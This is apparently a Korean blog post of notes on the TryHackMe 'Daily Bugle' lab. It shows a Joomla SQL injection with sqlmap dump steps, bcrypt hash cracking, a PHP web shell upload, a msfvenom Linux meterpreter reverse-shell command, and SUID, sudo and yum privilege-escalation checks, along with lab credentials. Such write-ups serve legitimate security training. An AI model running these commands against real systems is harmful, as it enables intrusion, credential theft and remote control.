Daily Bugle
Compromise a Joomla CMS account via SQLi, practise cracking hashes and escalate your privileges by taking advantage of yum.
문제에 대한 포럼과 다른 방법의 팁들
https://tryhackme.com/thread/5e1ef29a2eda9b0f20b151fd
칼리에 joomla 스캐너 툴이 존재함
=> 버전: joomscan 3.7.0
http://10.10.113.114/administrator
Exploit-DB검색
searchsploit joomla 3.7.0
SQLMAP 진행
추출 순서
1. DBMS: --dbs
2. TABLE: -D joomla --tables
3. Columns: -D joomla -T users --columns
4. Values: –D joomla –T users –C admin_email,admin_pass --dump
root
iVamos!
jonah@tryhackme.com
spiderman123
발견된 hash를 대상으로 John the ripper
$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm
- bcrypt, Blowfish(OpenBSD)
salt:0veO/JSFh4389Lluc4Xya.
hash:dfy2MF.bZhz0jVMw.V.d3p12kBtZutm
joomla 관리자 페이지에서 templates 내용 수정하여 php웹쉘 업로드
- 최신 업데이트 방법에 대한 구글링이 필요한 내용
리눅스 venom 쉘 코드 제작
Linux Meterpreter Reverse Shell
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf
대표 페이로드
linux/x86/meterpreter/reverse_tcp
linux/x86/shell_reverse
Local Enumeration
1. linux-exploit-suggester => GCC설치가 안되어있으므로 불가.
2. LinPEAS.sh 스크립트=> 평문 비밀번호 발견 => /etc/passwd로 확인된 계정으로 ssh연결 시도
jjameson
nv5uz9r3ZEDzVjNu
권한상승
1. gcc 설치 유무: linux ex suggester 활용
2. cronjob 체크: crontab -l 등....
3. 바이너리 perm 체크: find / -perm -4000 2>/dev/null
4. sudo 체크: sudo -l
=> yum 확인 => 아래 경로에서 Exploit 확인 => 루트 Spawn
https://gtfobins.github.io/
'OSCP > TryHackMe' 카테고리의 다른 글
[Linux] MrRobot (0) | 2020.05.13 |
---|---|
Hacking with Powershell (0) | 2020.05.06 |
[Linux] Skynet (0) | 2020.04.23 |
[Linux] Game Zone (0) | 2020.04.22 |
[Windows] HackPark (0) | 2020.04.20 |